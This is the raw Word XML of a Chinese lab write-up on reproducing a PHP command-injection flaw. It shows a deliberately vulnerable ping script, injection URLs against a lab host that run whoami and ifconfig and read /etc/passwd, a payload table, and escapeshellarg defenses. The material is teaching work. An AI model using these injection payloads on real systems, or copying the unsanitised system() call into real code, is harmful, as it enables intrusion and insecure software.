                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ls </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>列出目</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>录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7FCC5B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仅</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> grep </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>搜索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9E0544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防御成功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ECF03" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B20F74C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9520FE4" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="heading_20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第二部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>命令执行漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="7FCCB87B" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="heading_21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>漏洞原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="36015918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漏洞文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/exec/01.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>直接将用户输入拼接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>命令，无任何过滤，可被注入任意系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C79B5" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="heading_22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞源码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23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6DC97C1E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B68D57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system(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"ping -c 3 ".$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);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7CCB78A7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88EDAC6" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="heading_23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>漏洞复现步骤（主机直接访问）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="4A91A955" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="heading_24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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：正常访问</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25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4999856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82E492" w14:textId="36D2164F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1266F7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia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/exec/01.php?ip=127.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4593F929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效果：正常执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA85AA" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="heading_25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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：管道符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> ifconfig</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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17DA232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EA75C1" w14:textId="2DDD8520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1266F7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia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/exec/01.php?ip=127.0.0.1|ifconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23AA7AE9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效果：显示网卡信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E9390" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="heading_26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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：管道符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> netstat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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36CC66A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87E59E" w14:textId="5324DE74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>http://</w:t>
            </w:r>
            <w:r w:rsidR="001266F7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia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/exec/01.php?ip=127.0.0.1|netstat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1628BD52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效果：显示网络连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAA7DC6" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="heading_27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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：分号；执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:proofErr w:type="spellEnd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1C68B0F0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B24C27" w14:textId="129499B2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1266F7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia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/exec/01.php?ip=127.0.0.1;whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45C4E436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效果：显示当前用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33700151" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="heading_28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：读取敏感文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29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019D545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0A18D" w14:textId="460737CE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</w:t>
            </w:r>
            <w:r w:rsidR="001266F7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>192.168.44.128</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/exec/01.php?ip=127.0.0.1;cat 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etc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/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="371CC0FD" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91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效果：读取系统用户文件，漏洞利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA7350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2CB17167" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="heading_29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>常用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30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803D08" w14:paraId="18053656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CFD6C5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Payload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A34B62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效果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22DEA" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/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F653C9" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="1F944C24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9A138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[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127.0.0.1](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127.0.0.1);</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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68C76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顺序执行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038D3D" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/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C0A4F" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="5B7582C7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5F4DF9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[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127.0.0.1](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127.0.0.1)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B907B7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ifconfig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AE79A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截断执行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A9F2B" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="744752B4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3CFE2C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[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127.0.0.1](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127.0.0.1)&amp;&amp;ls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08A528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前成功后执行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9A0CD" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/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32B126" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="10447838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14F1F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test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4A0630" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto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61E4A6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id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CAD6E5" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>前失败</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>后执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="10B93525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B13007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[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127.0.0.1](</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>127.0.0.1);cat /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/passwd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B50B9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读取敏感文件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5AADD7" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/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43C16D" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5ABAB04D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8DD2478" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="heading_30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>三、项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="38D3491F" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="heading_31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>知识点汇总</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4EA96E99" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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5.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：命令执行函数、命令连接符、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escapeshellarg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>防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3CAB1" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：漏洞成因、复现步骤、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>构造。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21130919" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="heading_32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>漏洞与防御对比</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33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803D08" w14:paraId="1091B5D7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E69CD8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文件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E5813D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10D2D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过滤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F50339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状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="69A9606E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21043D" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>testExec.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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01C6E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教学演示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02137A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无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9A982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无输入点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="5DF6B24F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FBF0F8" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>repairExec.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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99BC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防御演示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03866" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>escapeshellarg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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68DB76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安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="5077C255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9E2020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exec/01.php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D8100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漏洞演示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1A53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无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220C1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高危漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3658882B" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="heading_33"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>防御方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="654915CF" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
